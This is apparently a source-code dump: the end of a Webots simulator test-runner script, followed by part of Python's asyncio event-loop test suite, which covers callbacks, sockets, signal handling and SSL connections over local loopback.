shutil.copyfile(protosSourceDirectory + protoFileName,
protosTargetDirectory + os.sep + protoFileName)
worldsCount = generateWorldsList(groupName, worldsFilename)
firstSimulation = findFirstWorldFilename(worldsFilename)
if not os.path.exists(firstSimulation):
continue
resetIndexFile(indexFilename)
# Here is an example to run webots in gdb and display the stack
# when it crashes.
# this is particuarliy useful to debug on the jenkins server
# command = Command('gdb -ex run --args ' + webotsFullPath + '-bin ' +
# firstSimulation + ' --mode=fast --minimize')
# command.run(silent = False)
command = Command(webotsFullPath + ' ' + firstSimulation + ' ' + webotsArguments)
# redirect stdout and stderr to files
command.runTest(timeout=10 * 60) # 10 minutes
if command.isTimeout or command.returncode != 0:
if command.isTimeout:
failures += 1
appendToOutputFile(
'FAILURE: Webots has been terminated ' +
'by the test suite script\n')
else:
failures += 1
appendToOutputFile(
'FAILURE: Webots exits abnormally with this error code: ' +
str(command.returncode) + '\n')
testFailed = True
else:
# check count of executed worlds
tempFile = open(tempWorldCounterFilename)
counterString = tempFile.read()
tempFile.close()
if int(counterString) < worldsCount:
testFailed = True
appendToOutputFile('FAILURE: Some tests have not been executed\n')
appendToOutputFile('- expected number of worlds: %d\n' % (worldsCount))
appendToOutputFile('- number of worlds actually tested: %s)\n' % (counterString))
else:
with open(webotsStdErrFilename, 'r') as file:
if 'Failure' in file.read():
failures += 1
if testFailed:
appendToOutputFile('\nWebots complete STDOUT log:\n')
with open(webotsStdOutFilename) as f:
for line in f:
appendToOutputFile(line)
appendToOutputFile('\nWebots complete STDERR log:\n')
with open(webotsStdErrFilename) as f:
for line in f:
appendToOutputFile(line)
if '(core dumped)' in line:
l = line[0:line.find(' Segmentation fault')]
pid = int(l[l.rfind(' ') + 1:])
core_dump_file = '/tmp/core_webots-bin.' + str(pid)
if os.path.exists(core_dump_file):
appendToOutputFile(subprocess.check_output([
'gdb', '--batch', '--quiet', '-ex', 'bt', '-ex',
'quit', '../bin/webots-bin', core_dump_file
]))
os.remove(core_dump_file)
else:
appendToOutputFile(
'Cannot get the core dump file: "%s" does not exist.' % core_dump_file
)
appendToOutputFile('\n' + finalMessage + '\n')
time.sleep(1)
if monitorOutputCommand.isRunning():
monitorOutputCommand.terminate(force=True)
with open(outputFilename, 'r') as file:
content = file.read()
failures += content.count('FAILURE ')
sys.exit(failures)
|
test_events.py
|
"""Tests for events.py."""
import pytest
import collections.abc
import concurrent.futures
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
import time
try:
monotime = time.monotonic
except AttributeError:
monotime = time.time
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
return loop.run_until_complete(doit())
finally:
loop.stop()
loop.close()
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', (self.state,self.data)
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = monotime()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = monotime()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
